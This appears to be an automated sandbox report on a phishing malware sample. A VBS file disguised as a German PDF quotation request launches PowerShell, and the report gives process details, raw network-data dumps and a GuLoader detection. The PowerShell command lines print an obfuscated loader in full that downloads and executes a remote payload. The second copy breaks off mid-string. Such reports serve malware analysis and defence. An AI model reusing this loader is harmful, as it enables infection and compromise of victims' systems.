                                                                                                  2025-03-10 19:38:40 UTC4642INData Raw: 88 61 1a d9 7f 24 62 b5 df 9b 5d aa a8 5f 7d 44 ff bd 7d 47 53 6e 42 bc 3a bd ed 7a 18 25 52 cd 96 b6 77 77 8b ca d3 66 ee fa d6 0a 7f 59 0e 8f 36 ea ca ec d7 b4 cb e0 98 96 b0 22 42 64 26 b7 f0 65 20 9a 3d ee 46 a4 32 48 a1 bd 5b 23 ce 8c c4 02 e8 7d da 96 27 bf 33 f7 eb 0d 48 ac 39 02 27 1d dc 08 49 26 23 b4 e7 4e 50 67 b8 7f 83 73 03 43 1f c7 07 25 7c c8 8b cb bb ff b2 41 e2 e9 3c 16 6b e3 35 b9 6a 02 ce 0b 61 fb 5f 28 67 a2 2e 75 3c 65 69 02 35 e6 fa f3 57 05 4c 6c 86 3f d4 e8 a5 37 0f cf 8a 36 7a d6 60 43 b0 6a 10 3c 83 29 ec 1e c9 74 cd da a1 1b b9 97 28 6c 76 f6 39 e0 fd aa 09 96 38 57 00 f5 df 38 3d 81 f6 32 31 85 83 a9 fb 00 c6 0a 8f a2 f1 14 8f 5e 99 ad 33 b8 6f 0e 2d 1e 32 7b 17 7d c1 8c 4f 6d d0 83 d9 5a e5 76 00 e3 e9 8d b5 e0 97 10 96 59 83
                                                                                                  Data Ascii: a$b]_}D}GSnB:z%RwwfY6"Bd&e =F2H[#}'3H9'I&#NPgsC%|A<k5ja_(g.u<ei5WLl?76z`Cj<)t(lv98W8=21^3o-2{}OmZvY
                                                                                                  2025-03-10 19:38:40 UTC1326INData Raw: ca ec 74 f9 19 81 9b f1 d6 5b 08 fd d9 8f 92 c8 d5 03 d8 8c b5 d8 22 7f 6b 9f 47 6d f7 de 1d 5c 7d d7 07 56 23 cc 2e a0 54 bf 4f 4e cf 6e 5c a5 a5 da 65 35 90 05 d6 c5 0e 57 73 b3 80 e2 d4 27 37 2e 7c 4d de ec 0c 7a 2a 58 6b 93 83 af cd ed 9e cd 71 90 df 9a ca 0e 6e 70 a2 fb 7d 7c 4f 23 14 1b c9 95 ba f6 65 4a 5f 3b 49 e2 03 2f 2c 9d 2e fb dd 2e 07 a4 b6 cd c7 ec 29 b1 24 c8 f3 87 89 3f 17 c8 e0 25 7d cc bc 41 99 64 5a 2c 79 37 83 ea 71 53 4c 24 70 a9 82 9f e7 aa 5d 25 b8 e0 16 7f 5d 0f f3 0c 71 67 22 c9 c1 3c 71 99 84 9f d1 ec c5 6a 50 f3 ab e0 d2 36 6b 15 99 a1 b2 e1 31 09 db 2f 26 c1 89 21 25 5e c9 22 18 0d bf 3f 9e 69 2b 1f 02 21 4c 7d ff c4 64 19 f4 3b fb b9 a7 44 4c d5 83 c3 2e fc 39 4d 98 d1 42 6e a3 9d 8d 44 9a cc c3 a9 32 96 1a 6f 6d c4 ef 07 94
                                                                                                  Data Ascii: t["kGm\}V#.TONn\e5Ws'7.|Mz*Xkqnp}|O#eJ_;I/,..)$?%}AdZ,y7qSL$p]%]qg"<qjP6k1/&!%^"?i+!L}d;DL.9MBnD2om
                                                                                                  2025-03-10 19:38:40 UTC1342INData Raw: a2 4d 14 47 d7 9e 61 6a c3 da 7a 04 63 29 c0 81 3f 0a e7 a5 37 db d2 fe 9d e4 6d ac 66 6f 95 10 10 db 5d 56 d2 fe 99 32 2e d5 22 64 9a e6 37 28 95 0d bd a6 29 4e 5a fe 80 e9 f5 56 cd c2 16 e6 c3 9b 89 38 f5 9b 88 2f 2e c4 1f 85 12 ec 61 ed 9f 47 40 a7 04 62 3a 56 a3 7e 63 ef 8c 3b de 7f 6f 0d aa 21 84 e7 48 47 8d b5 6b d3 bb b6 08 0e c7 44 68 ad 4d ab 73 37 12 55 cb 6a 5a be 17 bf 23 10 49 00 db 91 36 46 53 3b b8 df ba 37 9c b9 81 cb 5e 4e 78 30 02 50 28 0b e3 8b 93 db b1 e2 1f 07 67 85 95 b1 93 a3 e1 94 2f 9b 05 a7 ac b7 ca 4b ed ec da ef df c5 19 46 93 89 15 6f 69 c7 77 dc 76 dd a2 d9 90 cf 4b e5 c4 b7 41 b4 13 25 8b 81 e9 a2 0e f7 47 da 38 96 0e 31 6f 40 a1 cb 72 de 04 78 a7 b3 f6 71 05 0a a9 99 de c1 7c 4b 62 65 b9 87 dc ea 70 58 c5 5c cb 1f 48 c9 7e
                                                                                                  Data Ascii: MGajzc)?7mfo]V2."d7()NZV8/.aG@b:V~c;o!HGkDhMs7UjZ#I6FS;7^Nx0P(g/KFoiwvKA%G81o@rxq|KbepX\H~
                                                                                                  2025-03-10 19:38:40 UTC1342INData Raw: 51 66 37 a1 ef df c5 2d 32 17 24 74 0d 17 a4 2d 61 61 a7 ff 42 4b b6 1b 3f 68 8c 9b 1b 61 aa b1 f5 11 6e a9 2c a0 19 ac d4 6d 45 de 54 4b bf 42 de 34 37 e0 7c ce 22 d9 29 56 17 05 26 a6 e7 44 44 e9 d4 6b e4 f5 65 32 05 ce 6b d0 bb d5 e1 07 c8 b9 60 1e e3 a7 ff 61 16 4f 85 44 b3 df 79 3a 74 af 68 48 aa ac 31 d1 fb 17 0c bb 33 e2 fa 11 7f fa 50 4b 23 61 ce 09 03 83 69 86 b6 80 b2 4f 6d 4e e7 5a fa 4c 02 16 e4 2c 55 3d ed 60 53 27 41 52 18 74 72 f7 7e ae 0b 78 53 f7 52 62 44 d2 ed 54 3a 24 01 55 43 a7 e1 d1 e9 3f fd f9 40 34 32 0a 7d 39 2b 21 f5 51 17 24 21 66 cf 8f e6 d2 61 e2 47 57 ec 38 4e 84 66 c2 db 4c 65 0f 95 1f 3f 6a bb 77 fc b9 db 44 70 23 d7 38 8d 55 74 8b d9 d3 94 1b 6c 25 b9 e7 b8 12 ea 7c 53 d9 08 19 59 1d 13 f3 9e cf 04 75 b5 4a ae 7d 4c b4 fa
                                                                                                  Data Ascii: Qf7-2$t-aaBK?han,mETKB47|")V&DDke2k`aODy:thH13PK#aiOmNZL,U=`S'ARtr~xSRbDT:$UC?@42}9+!Q$!faGW8NfLe?jwDp#8Utl%|SYuJ}L
                                                                                                  2025-03-10 19:38:40 UTC1342INData Raw: 7f 99 d0 05 55 c4 3a d3 ca 55 55 58 2a 85 1f af f5 61 85 fb de a6 2e 1e 93 50 01 49 49 43 20 29 c7 fe 7b 77 9e d9 a4 fb c5 a3 0f 3a 04 fb 48 d5 70 ed ab c7 ae 7d 37 e6 5b 61 19 0e 5a 49 34 85 3e d8 b6 79 23 bd b2 d4 62 b9 c7 f7 3e fa 59 8f 5f 87 dc 5e 99 c4 80 c2 7a 80 7b ce 2e ed 2f ff 89 7e f7 34 fa 34 86 f3 8a e9 a2 95 c9 e0 ec 09 f6 b6 ac 76 2c 80 77 81 7d 05 a4 bb 81 6c 8b cc ff 97 df 92 72 a0 80 f5 49 03 66 37 dd 11 01 4a 10 69 4e 7c 95 2f da 85 64 09 1b 9a 7f 4f c2 6f 78 58 e9 16 f2 1f 2d ee b9 78 26 a9 c8 96 60 8f 2c 75 17 38 01 34 88 fa bb 8f 88 02 f8 28 ed d4 d5 88 f0 f8 c5 84 79 74 e4 cb ea 76 15 ee 04 1c 47 65 00 85 1e 15 69 53 2a 57 35 8c 6f 92 f9 ab c5 62 44 90 eb 8b 66 c2 3f cc e7 6a 92 1c a7 da 4d 24 65 69 b0 ef e7 de 9b 75 15 97 ea ab 77
                                                                                                  Data Ascii: U:UUX*a.PIIC ){w:Hp}7[aZI4>y#b>Y_^z{./~44v,w}lrIf7JiN|/dOoxX-x&`,u84(ytvGeiS*W5obDf?jM$eiuw
                                                                                                  2025-03-10 19:38:40 UTC1342INData Raw: 07 2f 38 61 34 71 c0 45 70 5c 1f 5f f8 bc 2d 96 2f 08 08 fb a0 ee bb b9 f3 b2 1c 5a 49 fb 9c e5 9b 2a d7 ca 92 cd 7a 56 a3 8d f9 67 94 9a 6c b0 6b ac a5 03 98 12 45 ff e1 78 34 c5 b4 6b 9c 2b a7 cf 1c 4d 60 33 aa 40 39 ff d3 ea 22 bc cc d3 4c 1a 4f c4 74 90 9d 57 5d 90 f3 cd c9 11 31 6d 33 89 dc e8 5a 61 f9 5b 48 f8 92 5d 6b 07 e3 a4 47 75 be 4b c4 10 cc 15 b9 2f 99 b3 00 84 ff 8c 4a b6 5f 98 47 6c 84 5c e9 7a 45 49 e1 de 55 8b 66 98 12 b1 7c e6 76 d5 5c ee 7b be 06 04 9a b0 e9 a2 70 ce 18 a7 56 45 25 d3 86 38 78 cd 30 0f ea 20 0a 87 92 34 f6 e5 40 61 98 d4 ee 3b a9 70 7d bb 84 46 b7 f8 0e 3a f9 0b e0 52 64 da 2b 33 9a ff 95 9a a2 e1 4b 4f c2 61 90 4c 1e 6e 32 81 dd c3 e8 36 66 c9 82 93 fd e1 0a 0c 94 6d f2 96 6f 3d 8d 7f 28 d3 50 07 3d 57 56 36 3c c0 26
                                                                                                  Data Ascii: /8a4qEp\_-/ZI*zVglkEx4k+M`3@9"LOtW]1m3Za[H]kGuK/J_Gl\zEIUf|v\{pVE%8x0 4@a;p}F:Rd+3KOaLn26fmo=(P=WV6<&
                                                                                                  2025-03-10 19:38:40 UTC1342INData Raw: 8e 23 49 de 64 84 65 45 f2 dc f0 7a cc 23 c9 46 bb 25 87 c3 c8 3e d7 09 6f f7 c5 4b 22 a0 18 ba be 08 3d b6 0b 66 fa 47 ba 1c 0d f6 e5 fc 69 ed c0 e8 bd 71 51 4f 89 82 80 42 3c b2 e1 37 77 90 51 98 f2 9b 81 24 66 d4 e4 21 97 d1 73 17 ae 01 1c 33 ca ae 36 d5 04 e9 fd 20 9e 3c ec 55 e1 0f d9 26 7b 8b e8 1b d2 f3 47 bf aa e1 7b 4f 5b 4a de 42 f6 b9 b8 fa d1 17 27 0f 68 1e a8 86 26 af 01 c9 9f 54 e5 f1 86 c0 92 ee fc 7a 38 76 37 4d c2 00 66 60 dc ec 11 98 22 fb c1 0e 01 9a 1a 5a 8b ae 1e 1f 11 56 c0 b6 39 b2 82 39 39 32 0a 4b 4b 2f 44 82 eb d6 a2 e5 fa d3 58 01 28 df 05 7c 0d b1 5b 60 bc 3b b8 e9 8c e8 64 e0 a2 c5 19 84 76 8d 9f 65 3e 90 7b e1 79 99 a0 e6 40 d0 34 d0 91 0b d7 93 90 c2 96 1c c7 25 76 48 ae 01 41 69 4f 63 aa c9 e8 1a 47 d0 cc af 74 d7 68 4a 4b
                                                                                                  Data Ascii: #IdeEz#F%>oK"=fGiqQOB<7wQ$f!s36 <U&{G{O[JB'h&Tz8v7Mf`"ZV9992KK/DX(|[`;dve>{y@4%vHAiOcGthJK
                                                                                                  2025-03-10 19:38:40 UTC1342INData Raw: 47 96 d1 60 0f 4a 29 1e 93 2b f7 13 fb 42 1f ad 7c 24 74 92 31 db ee 3c 47 db 41 41 83 52 8d 15 95 fc 59 79 12 94 de 75 0e b7 2f 57 98 40 96 b5 76 46 3f 6e 13 94 4c 13 ac 04 3c 66 bf 39 58 4f 1f d3 61 3c 9e 19 b0 e4 50 93 b6 7c 05 53 1c 0e ef 6b 83 b0 e5 4d b6 af 70 92 9a 59 44 7e eb c7 d1 0e 5d 93 30 d0 0b d9 29 4e bf 20 65 ca b8 e1 d9 dc e3 f3 12 06 e3 f5 10 00 84 b0 f3 a2 92 ca 0b 08 fd ce 07 b4 d4 86 83 04 fc f3 d8 f4 e9 da f2 b3 92 5d de c4 df 64 cf 17 bd c0 3b 14 a8 54 15 52 d2 e5 c1 e7 38 f2 58 a9 40 4f 8d 66 e6 1f a8 0a a7 d0 0a b8 d7 74 ad b8 28 cf ec 81 3f b3 15 5e eb f7 22 36 7c 4b e5 fd e1 b1 67 49 ca 1d 7a 94 10 5d f9 5b 4b d1 37 dd c0 13 ab 09 dd d9 d3 16 f4 eb 0d a9 26 8f 26 76 a0 1c 8b 7a 02 7a d7 8a 91 27 43 37 53 0e f9 36 83 e8 46 59 d4
                                                                                                  Data Ascii: G`J)+B|$t1<GAARYyu/W@vF?nL<f9XOa<P|SkMpYD~]0)N e]d;TR8X@Oft(?^"6|KgIz][K7&&vzz'C7S6FY
                                                                                                  2025-03-10 19:38:40 UTC1342INData Raw: f9 fe 5b da f2 5f 50 2f 00 d7 26 2a 50 c0 c5 51 6d 47 3d af 79 54 31 da 1a dd f1 9a b6 93 c5 ff 71 2d e8 40 a4 dc ad e0 4b 3f 13 24 07 cd 5b da 8d 08 14 f2 2b fe 00 8f da 44 57 27 b0 8f d7 c1 d6 4e cc cd 65 68 fd 29 88 93 19 8c 49 18 8b 37 35 c0 9b e8 77 19 69 39 3a 55 ab 52 c8 46 82 fb d9 aa 5d f7 5f 14 bd 3a 4d ec 66 d7 9e b3 46 28 fa f3 07 31 d1 cc 91 d7 c4 c3 b7 37 a9 1b 57 95 4b c1 bb a2 dc a2 10 b6 06 2f 32 09 21 8e 25 bb e2 22 18 d3 67 90 88 e1 37 08 ab 62 75 a9 b1 19 09 e3 20 c7 d5 a2 e2 bf 88 08 e6 68 33 fc 39 2e 9c 3d 85 12 ea 34 d6 ac 33 cc 5f b8 de e1 b9 c6 cc 0d ee 8c 4f 7a 71 bb d9 93 97 c8 68 34 10 72 5d 74 90 07 5d d2 0e 93 b4 1e 16 81 af ec 43 20 30 13 cf 5b be 63 9a a1 28 5e 21 bf e3 f1 35 e2 c5 d9 65 59 d0 32 bf c4 03 55 46 78 27 78 d3
                                                                                                  Data Ascii: [_P/&*PQmG=yT1q-@K?$[+DW'Neh)I75wi9:URF]_:MfF(17WK/2!%"g7bu h39.=43_Ozqh4r]t]C 0[c(^!5eY2UFx'x


                                                                                                  Click to jump to process

                                                                                                  Click to jump to process

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Click to jump to process

                                                                                                  Target ID:0
                                                                                                  Start time:15:37:28
                                                                                                  Start date:10/03/2025
                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ANGEBOTSANFRAGE (Universit#U00e4t Klagenfurt) 10-03-2025#U00b7pdf.vbs"
                                                                                                  Imagebase:0x7ff6ab710000
                                                                                                  File size:170'496 bytes
                                                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:2
                                                                                                  Start time:15:37:30
                                                                                                  Start date:10/03/2025
                                                                                                  Path:C:\Windows\System32\PING.EXE
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:ping Host_6637.6637.6637.657e
                                                                                                  Imagebase:0x7ff6ef580000
                                                                                                  File size:22'528 bytes
                                                                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:3
                                                                                                  Start time:15:37:30
                                                                                                  Start date:10/03/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff60c8c0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:4
                                                                                                  Start time:15:37:30
                                                                                                  Start date:10/03/2025
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Uncaramelised;function Spuledes($Soncy){ .($Industrivirksomheders) ($Soncy)} function Paining($Kortform){$Suprascapular225=4;do{$Ancientest+=$Kortform[$Suprascapular225];$Suprascapular225+=5;$Rockerkrig=Format-List} until(!$Kortform[$Suprascapular225])$Ancientest}$Strghandlen=Paining 'ErhvNPouleHje TCere.Enclw';$Strghandlen+=Paining 'SneaEBrugbBla cOv rLFin iPr eE ArgNKelpT';$cravenhearted=Paining ' pplMSt roBenezScoriAraplOverlOweraUdvi/';$where=Paining ' GerT Retl HydsBitt1Fast2';$Cellobiose='Carl[Ch.rnSmaaeSo ftMono.EngrSAlfaeA.skr l,nvLy tIOverCSammEp.akp,espoTid,ISu gNB gfTAfseMSoc ABroenCensA uslGMobieSljfr.air]C mo:Mosa:PolySEsurESpekcRrinuB,koRKe tiRecotStvdyEa ePTrevrSparoDyflTEgneOTrapCBlokO KryLTryk=S.ua$,uscwBos Hstnke IterD.agE';$cravenhearted+=Paining 'A,th5 Amy.Hogn0galg Emp(KontW CapiSk.fnContd.yreoKo pw,redsUnna MensNUretTBust Beha1Sass0Data..ppl0Staa; For SmagW DisiFestn Til6 ol4Ufo,;Gyps ssex Nar6Sven4Amat;M ka ktt.rTeknvMene:afko1Inve3linj4Cont. M,v0Sept)Sex, CrocGSpyteTtnecAirvkNe.eodato/Uku.2 ou0Fors1Paar0 Cum0 Dag1Dipo0Impr1Hypn LeaF evii ammrBraeeBr,mf Hygo BruxOro./T yk1Ajou3T np4Hogf.Ni e0';$Unfauceted=Paining 'Roc.UMe,aSBy.neT.kbREven-GreeAPortG BraE PhenOrdst';$Disbursable=Paining 'Pa thMetetBiblt,rivpF,rssC.ar: For/ Je,/SyridAilcrAbsyiFrasvForleHove.SnvrgRickoU,saoSk vg CanlOxmaedi,t. islcGentoEnf mRaah/G leuTaalcTwan?.taveConrx .mvp.steoSrh rCarptEmpi=Hvisd HetoFredwMissn entlRepaoabsta P.rdTilb&Ariai Sard Fr,=Kbte1 Ilmi Mu 7LgbrdAlt.wAkk fVig RBlokP BemhBemavFejl9B.utuObol6 ktiAR lsAA,sudBorg6 MosiUniorNavaYUtilY Fil6Def 3HumdbDiktwH dgG Fo,YS.ceeAttr4conc-Simp0 rivQF lkC';$Benzinmotorernes=Paining 'Ere >';$Industrivirksomheders=Paining 'VauliEav Etanyx';$Samfundshjlperens='Fredningsplanerne';$Cocoon='\Squarely154.Gen';Spuledes (Paining ' A,s$miljgBrnel udeOFlorB hura Till ,nh:Tri,pHarmASoutV tiiOut NDrecSRut =Bonn$Af.aeFlinnPensV ur:AccrASirtpVag.p FerDSemiaPrept Hica Wee+Out.$AubacErytOA.ymcUngaoBo,yoGa,nn');Spuledes (Paining ' R.g$ micgR jsLSatsOGophB oorATantla ba: Sc mInfiA umMKapsmD ngOrundN rkeISekuSAfklMpart=Fork$T ssD KafiRailSPachB Co uAlloRHin ST lgaA taBRygtlulveE ve.Con,S,salp ummLKbeliBemgT Tri( ndi$Wel b .lieOpk nPee,Z sa.IAdeln ResMBremoD,aiTT psOUnterAfg eWo dRFin.NEth e l gsford)');Spuledes (Paining $Cellobiose);$Disbursable=$Mammonism[0];$forevigende=(Paining 'L ce$Rbd GCherL parOKv.kbKamgAAlmaLVanr:FodeuE akdOutbFLeucLHutuaDiktaCayadStilDOlymESterNForne th.SGhan=Ho.eNBagkEeuphwKirk- ClaOEkspbPinnJCen.e.dskCpredTHy,o SlacsFagmyGameSInert pheeCarnmBall.pidd$Indss djotGadgRSejlGTermh KnaAKrign AppD liglFagfEMegaN');Spuledes ($forevigende);Spuledes (Paining 'Lago$Esa,UNapod mof C ll.risa.ulkaveksdNonpdRente A,enFazieSul,sPrev. ,xeH Fo,eFritaLuded UdfeUdplrK.ntsVali[ L n$LegaUD.pin BerfDamea.ntiuAnt cstryequict Tare U,bdHvid] Per=Frdi$UncocFormrLittaP kevDawfemacan esuh ArbeFru aExtrrKun tF rueaglyd');$svaledes=Paining 'Sm.g$MiljUUvitdkapifMidtl .ala Misa TeedV lcdNonne ismnTe.eeantis Udh.Fo lDAnf osogew V gnAkkol P eo aasa,impdKontFOveriOverlKunaeMati(D,on$Ge mDdr,liInves stab N uudrisr UnbsBargahircbGteslUtaieA ch,Brig$ OveMSpaciStadlkondiRefoePla u Tvib R veforysAkkok Un yNonutTag.tjul eBrkdlFyr sNybaeSildsMeiok renostarnIndbvS,lfeSylln hrtTechi AnhoCorrnHandeUnn rOas sGrib)';$Milieubeskyttelseskonventioners=$Pavins;Spuledes (Paining ' Sp.$Po cgWienL rooFornbNyttatr mlAnlb:ParkLCampEPse dUnmagSkrae ycnR Kar=Jord(Loo TS,ibEB.giS skotNonm-NonsPAttraRecut FarHDbef Ste $s bsmkramiMeetlvigoI HexeSkr uFacibSpdlE.rtisT kskTidsYDel.T Me TBagsESkiplSognsU,brE BesS fl KTrumoGuttNMisdvUnexEmou N TrutCottIAmplODilaNR maEaf.pRthersLs e)');while (!$Ledger) {Spuledes (Paining 'util$unbagOpfolMipsoBemibCadeaCabilKuwa:C,biASexldA foe CenqTopauBil aBisecArbey fo,=Opsl$FrugBDesie TilhChieaFrotlDakfvD,nde Mals') ;Spuledes $svaledes;Spuledes (Paining 'Hypo[FldetSekuh vorRK rteNontArapiDGia,IUddaN apagChe . ubT inchEs irConce Egea rhvDLap.]Doze: Ind:G mpSSproLTimpETrigE S.np ath(Taft4Vejr0 aas0Trne0 und)');Spuledes (Paining ' Ta $P.ebgStrulGulvo diab Anta ollDeko:DeniLbetaESubtdRav.gVideESundRKran=O es(La,gT itzETop SSmaat Ove- oliPLe fAP efT Su HYrsn Bes$UngemHarmISlidlStirIsaboE UnduTr,aBHei eLic s rizK DipYWalet ClytRo,seSkolL ForSSkipeAllosMis KLaccO traNSkovVContETykkn ProTP.trIParrORoasNK.nfeGyror ,olsKran)') ;Spuledes (Paining ' mpl$RistGDe oLSarcOTriabKonsATricLOo i:Di,peNe,scDinghNonnuretocGedeaOlan=Over$Si.iGConylEnscOF lkBAnseaFljml Mis:EldrhBattAK nkrOv rr EnsiLnkoSUncoBsociuOmp R M,xgDeni+ to+Likv%Ento$MemoM Flyama.amCowfMAetho rskNKbspISk lSMal,MFolk. rrc StaO ppoUToten kriT') ;$Disbursable=$Mammonism[$Echuca]}$Pollster=334368;$Barytocelestite=30065;Spuledes (Paining 'funk$la rGM usLM ljoTraib moeAGgedlkons:MartlPetuy KlisStarK enO GulpFiskI D,msPige Mast=El,v G lg Po ESlagt Rom-se kc ,neoRussNSnertTi fEde iNNimbtTeab Rosb$SounMMaltIKlaslSe,rIBedrET opUEctoBGalgEMo uSAd.rkSubsYReg.tnessTTjave VelLProrSUneleL ngsSmokkMileosvinnMiljVUniveSt.rNmodttRegeI ourO ArbnFordEAdhir .onS');Spuledes (Paining 'Berr$SlidgTe nlOlieo,limbFarvaNonalSk d:KakoGDintoStrbrUdtrdDiseiSemioDammiSa,tdReci qui =Poly Tu.n[UnadS nsty kossKro.t aareFablmE,te.Par CLithoStninSalvvTileeN torBasitSkjo] app:Kemi:R siFBhlarWienoCa em UdvBFgtea blgs Omve,sce6Term4AbsoSsandtViserwhitiunshnbetog art(Aff $BortLBidsyUdbos OnekHelsoYp epTropi leksV.rv)');Spuledes (Paining 'pror$Sta.GHornlAtomO f sBS.niaKvruLU,gr:OutcTLngdeForetCh krCentAEye PCobsH TmmOE,tlS TripElash In,A RidtnoneEStra knyt=Deli Otio[Quans HexyAutosMototSammeVaa m mph. evTReasEScioXOr,ot exp.ForseFablNopdaCEft,OquadDUnw,i utoN ConGUnus]Past:miss:Hecta EulsSvincP ctIRas I.pst.RepaGC,moeBumpTKaprSYodltR spr Da iB,omn aneGAut ( igh$ToadGb,ocoTer,rUdmed TorI NumoafstI ,andBlge)');Spuledes (Paining ' Bes$ idrGTetrlTithOByrdbUdliATindL E c:P rtPServaHalvu.arbL jeriStirNSpejIFrafaWiddN Und5 bem2Tel.=baer$H antV.ltEPre,TUdperT,phaParoPSk lhshanosesqsOvnsPRenaH Br AtaxaT Gr,ERegi.CuncSForsUProjB PalSB kgTammoR SkiiSkyrN cupgMeta(Kl b$BetjpF.lkoTherLBaksL Bais SoltDobleAse RMa.s,Fru,$.ubwbCer AReslRAn,yYSaksTdksbOLi.pCUrtie.estLBilieKjersU ontHuskIOrthTWindEP ro)');Spuledes $Paulinian52;"
                                                                                                  Imagebase:0x7ff75ee50000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.1371459789.0000022590070000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:5
                                                                                                  Start time:15:37:30
                                                                                                  Start date:10/03/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff60c8c0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:6
                                                                                                  Start time:15:37:38
                                                                                                  Start date:10/03/2025
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                  Imagebase:0x7ff7d8d70000
                                                                                                  File size:55'320 bytes
                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:false

                                                                                                  Target ID:14
                                                                                                  Start time:15:37:52
                                                                                                  Start date:10/03/2025
                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Uncaramelised;function Spuledes($Soncy){ .($Industrivirksomheders) ($Soncy)} function Paining($Kortform){$Suprascapular225=4;do{$Ancientest+=$Kortform[$Suprascapular225];$Suprascapular225+=5;$Rockerkrig=Format-List} until(!$Kortform[$Suprascapular225])$Ancientest}$Strghandlen=Paining 'ErhvNPouleHje TCere.Enclw';$Strghandlen+=Paining 'SneaEBrugbBla cOv rLFin iPr eE ArgNKelpT';$cravenhearted=Paining ' pplMSt roBenezScoriAraplOverlOweraUdvi/';$where=Paining ' GerT Retl HydsBitt1Fast2';$Cellobiose='Carl[Ch.rnSmaaeSo ftMono.EngrSAlfaeA.skr l,nvLy tIOverCSammEp.akp,espoTid,ISu gNB gfTAfseMSoc ABroenCensA uslGMobieSljfr.air]C mo:Mosa:PolySEsurESpekcRrinuB,koRKe tiRecotStvdyEa ePTrevrSparoDyflTEgneOTrapCBlokO KryLTryk=S.ua$,uscwBos Hstnke IterD.agE';$cravenhearted+=Paining 'A,th5 Amy.Hogn0galg Emp(KontW CapiSk.fnContd.yreoKo pw,redsUnna MensNUretTBust Beha1Sass0Data..ppl0Staa; For SmagW DisiFestn Til6 ol4Ufo,;Gyps ssex Nar6Sven4Amat;M ka ktt.rTeknvMene:afko1Inve3linj4Cont. M,v0Sept)Sex, CrocGSpyteTtnecAirvkNe.eodato/Uku.2 ou0Fors1Paar0 Cum0 Dag1Dipo0Impr1Hypn LeaF evii ammrBraeeBr,mf Hygo BruxOro./T yk1Ajou3T np4Hogf.Ni e0';$Unfauceted=Paining 'Roc.UMe,aSBy.neT.kbREven-GreeAPortG BraE PhenOrdst';$Disbursable=Paining 'Pa thMetetBiblt,rivpF,rssC.ar: For/ Je,/SyridAilcrAbsyiFrasvForleHove.SnvrgRickoU,saoSk vg CanlOxmaedi,t. islcGentoEnf mRaah/G leuTaalcTwan?.taveConrx .mvp.steoSrh rCarptEmpi=Hvisd HetoFredwMissn entlRepaoabsta P.rdTilb&Ariai Sard Fr,=Kbte1 Ilmi Mu 7LgbrdAlt.wAkk fVig RBlokP BemhBemavFejl9B.utuObol6 ktiAR lsAA,sudBorg6 MosiUniorNavaYUtilY Fil6Def 3HumdbDiktwH dgG Fo,YS.ceeAttr4conc-Simp0 rivQF lkC';$Benzinmotorernes=Paining 'Ere >';$Industrivirksomheders=Paining 'VauliEav Etanyx';$Samfundshjlperens='Fredningsplanerne';$Cocoon='\Squarely154.Gen';Spuledes (Paining ' A,s$miljgBrnel udeOFlorB hura Till ,nh:Tri,pHarmASoutV tiiOut NDrecSRut =Bonn$Af.aeFlinnPensV ur:AccrASirtpVag.p FerDSemiaPrept Hica Wee+Out.$AubacErytOA.ymcUngaoBo,yoGa,nn');Spuledes (Paining ' R.g$ micgR jsLSatsOGophB oorATantla ba: Sc mInfiA umMKapsmD ngOrundN rkeISekuSAfklMpart=Fork$T ssD KafiRailSPachB Co uAlloRHin ST lgaA taBRygtlulveE ve.Con,S,salp ummLKbeliBemgT Tri( ndi$Wel b .lieOpk nPee,Z sa.IAdeln ResMBremoD,aiTT psOUnterAfg eWo dRFin.NEth e l gsford)');Spuledes (Paining $Cellobiose);$Disbursable=$Mammonism[0];$forevigende=(Paining 'L ce$Rbd GCherL parOKv.kbKamgAAlmaLVanr:FodeuE akdOutbFLeucLHutuaDiktaCayadStilDOlymESterNForne 